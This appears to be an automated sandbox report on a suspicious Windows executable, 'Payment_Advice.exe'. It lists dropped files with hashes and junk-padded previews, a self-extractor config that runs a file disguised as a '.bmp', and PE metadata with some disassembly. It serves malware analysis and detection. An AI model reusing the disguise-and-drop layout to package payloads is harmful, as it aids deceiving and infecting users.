                                                                                                  SSDEEP:12:OfrkieX1iydFrZ95yj9TEhxDyfWPS3IBPVGuaDg2:OfAxXEIZhuerDyOoIr2
                                                                                                  MD5:273F010A47ED012F27D22276F2F97BD9
                                                                                                  SHA1:D86C9B0C961E1E2255AF1FE16E30E8F52611097E
                                                                                                  SHA-256:36F51580C44FA8986A271DFFC5B32DEA97CB78D34378A678686CDE4096EFA133
                                                                                                  SHA-512:65965BF20565BD5460A05DDFB1A64390D44BA2B71DA701D4167CADA56CC3F53966AA07EAB65B6B8660DCED7CB463047A096BC816EC3AECB272CA347AA91BBD14
                                                                                                  Malicious:false
                                                                                                  Preview:3508T94py423G7884s1XlMT626w113B..FontConstants GuiDateTimePicker..C415u7O340K69K21Xcr19ztfFt0422g0515V42785ivChB1749be0223vl8Uj0s9Z5640h8FxP7CW7TWB71Ai72i4Q9n13T6Cx3SO29RJ682..UpDownConstants ToolTipConstants..y88zl8trH1T29LDX5y808Iv..GuiDateTimePicker ToolTipConstants..1B5841B0NDd76b7Rq94O12CU0g0t583g8891372uAQ33T699b8i7H51I5796gQm98204631375cui41859E4457Py9Lx2Cb32D6VyN18r5160..GuiDateTimePicker FileConstants..Wb0580927248pFhawU6K3DQsE8E97aJ8uH8n..ColorConstants TreeViewConstants..Of094l52YF0U796jWHn1RiR5557940JIf1r40iLA..GuiDateTimePicker BorderConstants..
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):592
                                                                                                  Entropy (8bit):5.612263157267689
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:pjs9OBwVUncsxjTJlGcVWRhlko80wJ8HLV:1s99UnrjTJlGOIh6oh6qV
                                                                                                  MD5:3596DC937866CCF66A45D2D6900CD655
                                                                                                  SHA1:A48E762929E2A9152F770071536BA158E6E3831F
                                                                                                  SHA-256:793159B7C1EE6BE94F2FCA20508AD33D6A9C872A93A2911365A3C544BD5F7AD2
                                                                                                  SHA-512:152882246AE141CDC07A0C13C8376A8A53604584A196E8B757FF3F516F29F8E7DCEA18B57DEB427599E58A3FFF394771A1F1B4011F6C81C1B25E730DF22AC450
                                                                                                  Malicious:false
                                                                                                  Preview:lO8UXfL49D9iS5kH84UF0c1s92601b03a07i8xl573X4vC..UpDownConstants ComboConstants..ba87Q81A7qmY2pOZa9y3Hw47v5tz0Y05iA240I316BNcR84A2pb9d2K40x..GuiDateTimePicker BorderConstants..QVi2L667s0082BYvUVI81RyF652qUd5gtL41d70218933wE97AgL6nw96Hr7c6G11BkF..FontConstants ComboConstants..8iD013sri0054LB9R6TM44R95vY4g0F7B6fN4tDK45UMl..UpDownConstants StructureConstants..y1sMN752I250j5V5034pSYM30759Zkr5h6g7z30CEj140s405t6A5vrIm77m281h6L17WRa56GX6a998P2J12SBL1Sg2R4o1N..DateTimeConstants ToolTipConstants..215vd68L6t3Itt40qaF63KwZkY1yqB654v51o99Cp77H4n5z3GYG4xYPOd3RS1..GuiDateTimePicker UpDownConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):543
Entropy (8bit):5.611637204691248
Encrypted:false
SSDEEP:12:BntyjDxRVYpkpW4B43FP0WabB72ldaGAXH25Yl13MqQha5ps:nq3VzpVBQTabp2lvA3MYvcqGa5O
MD5:C019178930BE539BDA686AA680014B2A
SHA1:70278516D8811A5A0A8E8EDE3557C96DCA25A9F9
SHA-256:002FF069C4AFBC1C0FB04DAF66C7BB549A884737D64008EBD943885266A86632
SHA-512:AC84C1DD31E0283FE0A27E649511481080FCB9091C8253FFC2FBCA073629DBB5CE3F625A723B852CDCE1EA9DDC1CC97250D459AF541EDDE4B2C0BA133A58ED9B
Malicious:false
Preview:6I2v22P5J50J18Im0BDj9cT99f9m3l45EDL6U384YzQt4h0R1367iM7x..ComboConstants StructureConstants..7f1RNV9MkOZ5n05bgIcnH982916TDd2Fx3n4zf588Ad86fFYJ3518PVN5t2a8t9L93380f2p8070ZiN1K1HO4x48..TreeViewConstants UpDownConstants..3m888R2R4UjOOA4X8sgIps8V81u4JQ461W6f2tdW105T9EM6jEX9Z80742YYw39m78tr437DxZv212cM4p8904eiIj80ZoIX28J5Za2v8t927Ph3ip8676v9uWg2Ac3gMM19Q6kPgHdvY..ComboConstants BorderConstants..4M7Ih1Z603A16dt6mFi92jY23nPSo62rtkbkFCKW7f3P5FS4r650YAy2RO88yra7erD6494Z19l05VWxa817fIdi9L4u4z4hi476sb2t85vRC6f79pf2vm..FontConstants ColorConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):50536
Entropy (8bit):3.8013017461040275
Encrypted:false
SSDEEP:768:IDAuhGDAuhZDAuhxDAuhcDAuhfFDAuhBDAuhNDAuhVDAuh2zDAuhr:TIdIqIiInIf2ISIeImI2wIr
MD5:B1842F2E9A5245405D6088A22772E761
SHA1:6471DF4D6FAD183FD07BE9BF77E6F762C4C49D1E
SHA-256:BF5BB8856678B50C2C69BAFA7C853024FB46AC12B9A1CEE4E1E6669F35665FC1
SHA-512:AE9DCBC9A67AB6E430F1A30F95749879BB60774832B1EBBC3EC87377055459041BB68070A1BE776AE86CC44E781DB5D2C3C8D207D930EE86085B8DA4E3E62DA8
Malicious:false
Preview:..'.3.5.U.5.X.5.9.j.....'.8.O.5.2.y.4.4.5.....'.Z.3.8.3.9.q.G.3.5.O.0.7.8.R.5.s.....'.G.1.z.f.q.c.F.9.3.a.S.0.3.k.9.B.2.4.1.1.x.5.R.2.z.D.4.4.c.r.W.b.8.R.9.Z.1.9.A.J.3.8.i.t.0.Q.9.N.....'.o.3.6.8.F.a.2.z.7.w.D.y.g.4.7.P.1.n.6.9.7.8.4.c.1.f.1.9.....'.9.E.T.i.F.5.3.7.M.G.y.D.V.5.2.t.Y.r.8.K.w.v.F.7.2.0.j.O.j.1.w.6.7.....'.H.3.o.f.2.Z.8.O.5.2.1.e.6.3.9.V.e.....'.8.4.5.6.G.P.1.n.9.3.6.1.p.M.u.3.4.L.7.5.1.7.g.5.9.3.....'.5.7.t.3.7.l.2.9.W.u.a.0.8.2.8.8.g.R.7.B.2.n.4.2.w.w.t.m.W.3.2.7.J.3.G.O.7.s.9.P.5.i.1.8.1.7.2.8.....'.6.8.4.6.4.2.1.3.I.1.2.3.2.C.7.o.E.V.2.1.Q.B.7.8.5.6.4.6.n.C.r.3.Z.Y.3.4.4.L.Z.c.9.a.2.c.4.....'.3.d.1.Z.6.L.p.Z.3.s.g.C.k.9.D.Q.h.6.J.7.0.J.P.1.1.F.....'.O.0.8.U.8.C.7.1.U.i.4.4.7.9.F.D.F.A.G.S.5.m.1.1.8.1.y.9.w.k.i.5.7.f.r.....'.8.V.C.1.o.6.6.b.H.B.2.1.6.6.U.9.0.....'.K.4.s.6.3.o.n.N.U.5.g.F.M.c.H.2.c.1.m.3.4.Q.2.R.0.7.6.c.o.5.W.7.9.....'.9.5.D.1.2.U.r.m.3.a.3.x.C.7.l.F.9.0.7.4.R.2.2.K.9.2.c.7.S.A.6.....'.Z.n.5.5.2.4.O.U.E.4.0.d.5.1.C.a.O.j.M.D.o.L.6.6.O.i.M.b.2.3.K.3.Y.i.

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):360466
Entropy (8bit):4.033691022008579
Encrypted:false
SSDEEP:6144:NDNGviVuBHhnCpaFCc2RbiPF0TmKldDdk65ex8A:XYYp80Tpdk6IT
MD5:8CDDEF3C2E89CFE5B2BC527CDF316725
SHA1:1A689DB5E39E1E788605316D3524B50D499C84E2
SHA-256:BF1169787491F2F717AA645277D678E34593AFF8996044F1623DFA1B046D4352
SHA-512:A85D6D2926765A256006FBDD9E0B3E62FF0F4FFE42A2C1B4F29269671AC4B5BF0EAAD3B181814D6BBF89E7FAF96134F1F2F850550C8C0ECBEBE554803BD22586
Malicious:false
Preview:0x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

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):523
Entropy (8bit):5.486420516123225
Encrypted:false
SSDEEP:12:1MT2rRPAQOb2rkQF7JdBJ+v6Vtjj+GaV+Rc:1MTaE2rkg7JrJ+v6fjj+Gcwc
MD5:E9F7298897314DACB6218BA85505CC37
SHA1:B16AED5AF93CBDD7D10730C7CBDB5AD5119AEB88
SHA-256:1AE25BD330A4CC954BF2AD55284B029425E6965BCAF47D768A94C11A1964EC79
SHA-512:D181E6FF4A15FF9D551DD4E0A76BA287494D184CF4EDA548C9407BD492079BC389979D9D943348332EC05A7C5104008DA38E9F0BDFECF5BB9AA34C4C92EE7012
Malicious:false
Preview:3x872600M364378em7A8z7V..FontConstants ToolbarConstants..P6gmM21s19zX45BwoK..BorderConstants FileConstants..982AB77AFs040i967y5BC3aVFG21Kj79U2xyYE4v10941kt0k50N2q7v255Idh94N4UYd45S822L822z4B8ER52r027bR69A..ComboConstants FontConstants..91xW61wrh0F4KNC09598r7G06fTAQZSD6D30i0k8vy6kU64k42lRlZq2920M0X959U3R3P0965TH05cL6I6opo6f0dc2wNUb06W9KE8655Y..StructureConstants ButtonConstants..0yp4UaUY81k55337..ButtonConstants ToolbarConstants..B76T08J4pu6KK84Yh79RNTu3H06KsQB4toQEMqOqdyNbLwA55f29c..ColorConstants StructureConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):36464
Entropy (8bit):5.576228442031165
Encrypted:false
SSDEEP:768:0K0ePC97icbkkGnCKxg4N7GKqDeV8WDKYoWrVrUMG:0KBO7icIL+EqDK8+KYoWrpY
MD5:7F18C73615F6F22DD53C82179B071D3A
SHA1:BD3E73648F3D102D9655DF522CF96ABE2BD4450F
SHA-256:8C9ABEE11A1911C3F7DB7B44568AC6CE8D6D31D5CCEE401CBE5CB9CE16F21801
SHA-512:EA53A31173678275CEB7D1131E08EB80539CB3CD3E9476929194F93B5B70A0D30E999C76E2F10AC6344D29E6C09097ACEC87444CC87FEC93214B6F6E42A0D239
Malicious:false
Preview:03ig9760yE3253L0h07L0T6IPD0y250D46KK44276w..100w3Io119T1OE1K35O239v70464k2YmX60Afz0j09r426Ig0642o..894qsBkH813ilX5q20m85Ft7W29w58ai9z8nm7cz4p6l2Ig4PzS974T35W63..fY4sZ913V0GJE3VDWBFhy74R79827969140Ko4A74R84hQ265..30r3K1u8v8BK32573ii5v2E8b0PyD7p53Y57..61y0a3Wwvz0b31g168R0r44m3140p5N72470133..Q27s54N9I63E85oD139Xt3zHT08b3Gn97QW79Lr803O8kt2bye6v33N..vyLwqW765Ta6j09R3S3g7k64Asg57PFB2uB72688L..47c0x636Df81M08ktL09o46ZTbm8YE052l8UJ51711gf95nX..1LM99L178N2s9P88VD167N09S752c08013w09AUDod72zyM38m6M537K25518cGcO6w..FkGlEW1K6241PLz32WS2705aKfrSH35rjT6aQ710Y73560..u8l5X52rE3gvPe09811b4x22g986sYejmzOA8212ToNb..80xd60ib2P5zJ0YR8ip..75Z2T0n15n6l97Fj49949s1K51F364..d5246cll3V81evv32A8b22z1WfgN314k43X6Abk8ZO0sx57x4f87hkO1Pn91..mY2WH5ov486j8YGY762oJ3P85Y3Wp9p7H8aVC228UU2unXd4O3sf09T62t4ZC08X9647..3Xt9a466QHJ9a..2F3K382592783q3J3yT8U3NmS61x59075169p3M1907b7l02A4kG422g96B3..D7mMa3g78w17P54170690zM2tl56..E7q3SDUcg372218kV1V44xz..3G0q81t1jh3p1rING21x309Jafl252Ghbh31uR19X9O5ld..dw6H99944Y9d6vWhz1p7y865lR4JuPt

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):514
Entropy (8bit):5.492641979248927
Encrypted:false
SSDEEP:12:HJen/j+SPenDOnw/O9JTA7nQQ5ZGCjOXwBPc:HJeb+GeDOw/OPTAk+ZGtgO
MD5:FE96420D47790D25695E6178D758E06D
SHA1:0A94974CB7CEBFB4A4891BD3DCE4F3BB2AB0F7A0
SHA-256:B8BE155F510BCFFDC849F6A162BBA4532D1044AE09BD6668FA1E1E553A6CCE83
SHA-512:44D7A36E11A4B32C2A227A3E2D1FC5B588AB72F788CE00949A1BF945CC43B0B6594280E4B65641E012402F33FB74901B2ADB66C6EEE1FEFDAF5CD5DA680040E4
Malicious:false
Preview:3u2l88Z7836574k3D270e1Gv5327L2m1hmI21448n1m1Y8hgwQ4431P4i975itma22m67o51Z1U24S3Mp52F46P2NFwt456Yj7439W04rQ..DateTimeConstants BorderConstants..6613Vb39eool..ColorConstants BorderConstants..KcEsb8xZ6931s4RcSPrv848k7OP9D8WBqu2z2..GuiDateTimePicker FontConstants..5jrH4g9c1p9146879Bw4c09Z2Ze8V92599e05A8Fkx6aO7v8B80b70326yo621nV4TMNitETW7lU63mk5dB0..FontConstants ButtonConstants..oolu5r8N8I03j9G017394igj5H813d288339xgeuD4711OIzS74Cr61985Sf5u7Bl37039254KK86SN3KJ5wj055BzG06fkTh4i..ButtonConstants TreeViewConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):544
Entropy (8bit):5.4430987153635355
Encrypted:false
SSDEEP:12:dlPSreQQ+OGps+jWVe0PUwhV6iU79v3W41IYICJ:dlPSSRGxjW8fg63JvGqILCJ
MD5:3691A998A5084B4CA7AA32EB7175630D
SHA1:4A706B554E1664F6DAEB90DBBD1FDDB95123B32E
SHA-256:84486C3CADC3CB8F4B982B77AAFBDD4503EDAAFDAA797E84F570CC1970B51A25
SHA-512:6559DFDF33614B2FAA3DA54E697F08528E8C6FE0B4463A3B394FDDC14F9417787AAF5CD00DF3F0796032E8CC605BF3F2F042182BA9380D24DABFD9614894B184
Malicious:false
Preview:7g02tL9wQ13f3R0Mms4K0pXQ12Eo73365v7FbKpc12l78h0u04S7k8H0..FileConstants ColorConstants..47KwxND7C82hBi4M767m0FVtv53N40XeP90..BorderConstants ComboConstants..z28721658378C5TO5603y3G3uDHW6F9t853em9nR2N9425sKX78F2cRE64X208f294k97Dm1fQ6934Q7WT10i26..TreeViewConstants FontConstants..0t2M1597JLH41vT5354oUZnr5Slpc9ot5u633771J15z09i9Eb6j5cG116G09..DateTimeConstants ColorConstants..0e0L732M0d6q5M5589684LNScak6sJy2766LjIK0T806i709h26Vt438a3q7Gw7or9uK4rj32..ToolbarConstants ToolTipConstants..369Ux84x658Nu0lbdnjq5959yVA..FileConstants FontConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):605
Entropy (8bit):5.536085104858179
Encrypted:false
SSDEEP:12:w5bSEwnkyzYtExRbNDXg3b42LqmZAOY5D0RdeAkC:w5bSEwnkyzYtELNLG7/g90VkC
MD5:E73990700830EDF4688E3BEA361D3B1D
SHA1:E426202D11E3733F9368DD3AA6D8A11299755071
SHA-256:5C4D023B567F983E777EEF2562B5CD595AA4189E8E597B2F2EB741ECD7C25F52
SHA-512:ECE2F8BEDF3991E98894B9A86C4D92C9C1BBE620253CE3DD26E6C86E7B52426F498CE6980ACFF9707CC13A4D1819AE84B9E4FFA3CCCF6FD1829995600021725D
Malicious:false
Preview:128FUb80757l07ywD08ol402j0hMy1288d78..FontConstants UpDownConstants..4Y5S2..ColorConstants GuiDateTimePicker..6FxZlku1fTu5r36U344Xn2Z033FSb7279XneTHK66Ulw7A3K32C..UpDownConstants DateTimeConstants..jLj3oTc4OI..ComboConstants FontConstants..66EZX7V690z943Jv8758Vl5335iT9B87F1aQB5OatwS80e9M06q0B24r77yfzbC9z23lwB8j539hKar943a5V3vzGh4223e4Zid6tIQs4B84F76262n4UfC7f3mxUi06sT1037e18e4cO3y2867s8K803Z13n4T67D52ANOM7..DateTimeConstants ToolTipConstants..UYb8e4Yd93o1E3zZF3Y46p1Z674F64t42T057340DKVG3Lgv8fq84U535LB3NR633qqPee3Rv96q7X4swQ13x0ED6B38C64GS9wKNXfw707608DOfric9T486..GuiDateTimePicker ButtonConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):639
Entropy (8bit):5.557774913615759
Encrypted:false
SSDEEP:12:EGZ77rZFtUGzRiO2KNkyAdoTLmfqmhRDInh6xRPox:EGZnrZ59HNUofIqmhREn0S
MD5:D471DE477FD0A022AEC584CFF1AD7A35
SHA1:AF7D19B04DD2B400DD6D37E4553B47EF0C21D644
SHA-256:69F68E381BC3C6AE9589B9F484C78557B02F3BCF5ECF29FE7578E7C9869D2530
SHA-512:284A39169ACBE793C3ED26B7233133340B42E1174C0E80296AF7C287447A291B75D996AB681473CEB439CDD310C356D4E7266E235405B5EB2C2F7B72CA1802AA
Malicious:false
Preview:5417O4M1pBS6B63E83191x16L71Q0Z1W9pZ2OAD5zX6b86ssX3dQ91SsCjJ88V18O4UXtZdRjX454DX3..GuiDateTimePicker ButtonConstants..4ws9n2gc7V47RgmP7Vn60vmL8k710b66iL4oigiC299F65k8km0ta15vMH..FileConstants StructureConstants..3gtJ62jw8O4763UVr825807O2wpEux6638hX92Cy11f648W8351S62257V3iXbCBYs646..ToolTipConstants ColorConstants..G8tZ5ElyE36s5TW2L765Z2tM84965Exe16L52J2ia7r5ON99Q02749z4V623F4KkL99Yl8Dw4i6272bei1j3610lRFipO8L9UN3W5WyW60wpXK7llC005ta70g1RG857RIB8FiK2t7i556H52m86..ButtonConstants FontConstants..jmn964FJZmrDi6535kD25HhY1XQM640w8P6060d01jCLA8895Q00Mq0jW8d21M8M2k3Am401Ua09288373h988749P144J7iX6r3960D5..DateTimeConstants ToolTipConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):560
Entropy (8bit):5.545300329614889
Encrypted:false
SSDEEP:6:3KUuteBScgrt2/5hYqmCztBdeszRDtbVFdADqW8kogq2EKWAGx3U+Xp+oFUaYyJF:DBPCt2/oqNAmTOfPniTrXuaYyv
MD5:7642278FD6ABC06D1FE502C833F9CB2A
SHA1:29CD8DB95D709EB95B8FA1C63F248D24733EEDB4
SHA-256:5779120C6F16C60CCC2B82A21A114A329F5867D4FFD821583D6557307ECBD5C5
SHA-512:2BBC66BB13195CBAB4C1F9429B0B4EDDEF0A4D3A4282C845C8E4848D2B8331EE293B238FD17A59077B967918DB6B8FBE0B910AFBFE7D95FFDBFC2033DD66244C
Malicious:false
Preview:qAGN2yTB0updves76i0s07gQ021K2..ColorConstants TreeViewConstants..8qOr2nqql790F2wlczaK315K38MH925Lu292Zj5701z2at8uV..ButtonConstants FileConstants..V805qZH24894Tc4v4hb8I682FM523F14cE698d283Q9b49lyy2bH24LKoGoZw30Hh4m409655032N78eS03bUHCpcwL3pjryVzZ8..ToolbarConstants UpDownConstants..348Rm6496B14c63q949uI9S2E078s4B03262T4U2JYt1F36rD9F279W1..FontConstants UpDownConstants..7TIDl21SmZX49x00F66757dyT071MjMY92rAH9IE9C5G330z46IO7g022x07A9967I527A4A4tqOYuQ..UpDownConstants ColorConstants..qu8kqa534GlHG5w1ADIx50In10Y42Y18Ib9i7I..BorderConstants GuiDateTimePicker..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):524
Entropy (8bit):5.545506791400954
Encrypted:false
SSDEEP:12:DzEOvMXjPW09Eis6O4FUTWUHtiUfE4ttJ0:RA9Eiq4FUTXtiUfn0
MD5:6A42BCB175E8CB9E65D4879172D8C546
SHA1:6984B6C27A7FA56D5B898E64525D6DF935682957
SHA-256:5FDC74E2A783B1FB19FCC19FD5A36D8E6D7B790C20192214471F74C7D7427130
SHA-512:AC3FB6AF168F09BB5C2F11D8A6550ECF85FEA7A8C1BF6DD8B9CAA2B0D4FE2CD944D579DC00D23D62B739A82CF3BF8FF9598B7AC264380FF97D869FD9A3BA8642
Malicious:false
Preview:jH3161YqY8024skXq8HZ92qfK713900jk92u35215X660y..TreeViewConstants FileConstants..9U8l56u01mqe722I35Z0Qk34TT4Cpn36m5ut716P56h17Ykz17BfJ6w22n10fFnit8155P4mi0h8o78d1N59z2r4KK7202..StructureConstants UpDownConstants..eLxu186272vb0y5fU2z418Xq9rNKN46y7h4vdmr2aI5..UpDownConstants ButtonConstants..5AZ3bYqGwY987bb22a72175O86Bve096eXs9lD9n8HJP2gwI4rFv15O13K67x00nLB4xwW0g7U0560HP60y0l0UJD45..StructureConstants FileConstants..D724E088Y6P99b2wvtZT3SJ2k724R53y28mH5u65r5ip7aVLZ1Z88z62MgcAt292NMeebU06..ColorConstants UpDownConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):650
Entropy (8bit):5.610881619660425
Encrypted:false
SSDEEP:12:3aS1WzxnxCIs3yowK0/qIrl7tWdX1iXPuvRwjdScJO2n9/yD:3a80nfsiowK1IrZtaXqkRwjxMmqD
MD5:B6F197C606265A50745AEFFD66E66836
SHA1:A13D050F436C906FB5DAA2E69BEE8430F3643248
SHA-256:B4E858CFBF8A45D6D46D8DB4EF1AD2DAF0D7C0A0B8C53172D10AE4590E9F332E
SHA-512:81AAF49F3C838F4D8BFDA027F8162CA78F83B7E1DF4AECCBCFE97B102593662C83FC4C2A5AB43D28C7A5B01125FB3A4F298868983071E3C4D15CE528FD4B9448
Malicious:false
Preview:K11I4q66q995x4741u8v730840620851I..ToolbarConstants ToolTipConstants..7s14l08t0bj..FontConstants FontConstants..25Z06aI1f2liiG8AQ4J805MMsvnbv4iW6nZ71BB8kKLg157319v08y7Zcm05jO5454Nd5cH1B861q2kL46368EI7Qk..ToolTipConstants ToolTipConstants..j9567c95qVF73yU4I38EO28655W6087FH7HsAV30vsST4yT14EJ4hGpL9eK85VmDhb63mv0ngzT6BWyL5E71Ph7ZnOyPQO5W4k3qe8z4Vbx2961nlL3f1P2603e7N4l0G0133el641285U1y..GuiDateTimePicker FileConstants..3FqlQR961fV752v4cz1aR396qvUdtI4u213013YS8bi0t..ColorConstants GuiDateTimePicker..A4VP1s11rUvXIR82EzgIzyU33Pl6j27oP7F976ex58hK2O163AZ7936062HeF35ITaz7g47X81127J9e49gC7a00162BQdcahxY2w70GQ4K3485RuT5VK..ToolTipConstants FileConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):534
Entropy (8bit):5.566200256464235
Encrypted:false
SSDEEP:12:CzRBOzRFFfbaqny2LBYnauTIUGAqP9RmAcVdh5WZyq:CzbOdfbacy6YbumAcVdh5WZyq
MD5:D29F9DB19D138B1D9FAA12EBD0DDB541
SHA1:5E2AD088BD09B950BDC501D7AEA589351356F8B0
SHA-256:94391F43F8FB6582CEF9F9368D56A43721826AEE67A05BC092D125B895239E0B
SHA-512:04B5544A47830DC449938256601F8D2BCDD7110D766E31A3F9C7D4DA8028309968A5C30455149E101F1FD90E31B479B67F56766994616D7DD3C11DE5F32CAB0A
Malicious:false
Preview:hF2gsx3i60QuAB24U6xnv008E1r8PTZi58o47x15qEmU8532NW553R2YdA858l1lX8y8X8q119o03NZX84rTH02P5..FontConstants UpDownConstants..k8z946P8xv963vgi07Y8963M074V404dOm6fLq89l8n61U246q200w57i088DmXs13lD5491WP178941oR91eA4W225mvRYEeoq476pt7U5m6X2DF7364gE8CY3165ic6xY8O39LB1F98E..FontConstants ComboConstants..033R3v4hLM3ijpL72a3126YP4j69gp00169V00Kf42V0959t4v200WmQH5999bEwXc9ws5M9f7871347x37m852S9f427J0sV341X2kbsaXdvo8AHR4..TreeViewConstants StructureConstants..81Ie97Z1DP6g3zl6k94u8Mzx98B542T34yB3Z5HNBG3i..StructureConstants ToolTipConstants..

Process:C:\Users\user\Desktop\Payment_Advice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):634
Entropy (8bit):5.5604978590285326
Encrypted:false
SSDEEP:12:XZLF2XQFZKUApbGyQuS2IUN8UAnSbn52Iq:pLF2XIKJMyQJvUGUySbn7q
MD5:58C8740DD9D8C9A6393D4321F8E635B4
SHA1:3915412FA75ED57EBB025606C73E4F796FD35191
SHA-256:9072F3031B047CCCFACF32609507C48F2BBF25F8EDC27AB2847CC73245E45294
SHA-512:92894A63750F1153169FFD46A273F31AAEF249FC0E54454B45C00DFEA5E23BC524BCC8581CCB1C922F7FB8B8361052C779B1CE25B83A3288CCE06D31E4D710DF
Malicious:false
Preview:427wm2T92A9z5Ipv05HkVEb6E0GK9uDYt18UjFDqX2VX3p8c498z5I36nKs99U513KO6z3eH6..UpDownConstants ToolbarConstants..55a3P468J3d5hY6989l63jG3f0Bs6916Ts78Z9560f590..FileConstants ButtonConstants..a2e16V92h7088XS1Yo1C4Dy42ABa21X62SfMJ0FG3g51T6CH6OBm5F4jS963vo4681No94672nPE8I23..ToolTipConstants ToolbarConstants..760KH0a177W37V8IZ7OEl4X93G38Q8Kr2hM0imRfa3r75O2wN9kbD5jW6r1417l9730dmvk51Yc3053J1b52349nj2907idr009EK166uw36h164..StructureConstants ComboConstants..Y66Z444vhGC73hDTHe82u7DuB311058mWxv09Xv0v7173fr73m9543dbf764691Uvj590mHjYb9Ud3Muzma2a122ok12hnG8sl8FAg2148IUKfVh1Bz6E8352Ca817CPb7Txpge79b346L..StructureConstants ToolTipConstants..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):77
                                                                                                  Entropy (8bit):4.820575548015795
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:YRRvuf1lXhONvkY/ndYmN8wV/Isn:AvgDO9k4WgAs
                                                                                                  MD5:7A660CE753E331647665C2DD94F4B0D6
                                                                                                  SHA1:737696F79AAD5994703C6CDCD7008CBF4CC641FE
                                                                                                  SHA-256:33D2BE393F9CB8EA01161D1D38610B72B7D7C6C65F51ECCD6374316E856475A3
                                                                                                  SHA-512:19B9630022B367801653FBB37CE99CD8CC7B5569C361CEF78B51B3E909648DF93EB0FFE047E636700BD8C1014355010B0D9A3F1E19E6347BF914A06F93D7D999
                                                                                                  Malicious:false
                                                                                                  Preview:[S3tt!ng]..stpths=%userprofile%..Key=..Dir3ctory=ftpc..ExE_c=ewdbwwfpdh.bmp..
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.79974903583339
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:Payment_Advice.exe
                                                                                                  File size:1'131'860 bytes
                                                                                                  MD5:15b3674e7fe8c5fe5284bc290a09ecb8
                                                                                                  SHA1:222c994082583413a9ea054eaf41583712702a53
                                                                                                  SHA256:eb53ed1886ae853bdeb51270964242b2b03373388e65acc012c8fe0485b81514
                                                                                                  SHA512:848cd01f78bcd132bdd724f83cc99957d9110a569f1434528820f58b185a258a67522b2914d29d4670ddafe84d8fe760c021a55748cf53b7a66a01ad5470d2e6
                                                                                                  SSDEEP:24576:MTbBv5rUDkdwJ5nNr75xArQX8k18FGa6mPcyGJzQfs8FiNGVDg:OB/u5nd7HbXboGBQfoo0
                                                                                                  TLSH:8F351212B9C258B2C4721E326A757B20AA7C7C301FA58EDFA3E4952DDD715C1D331BA2
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                                  Icon Hash:146c5b13131a573e
                                                                                                  Entrypoint:0x41f530
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:1
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:1
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:1
                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                  Instruction
                                                                                                  call 00007F4311853B8Bh
                                                                                                  jmp 00007F431185349Dh
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  mov esi, ecx
                                                                                                  call 00007F43118462E7h
                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                  mov eax, ecx
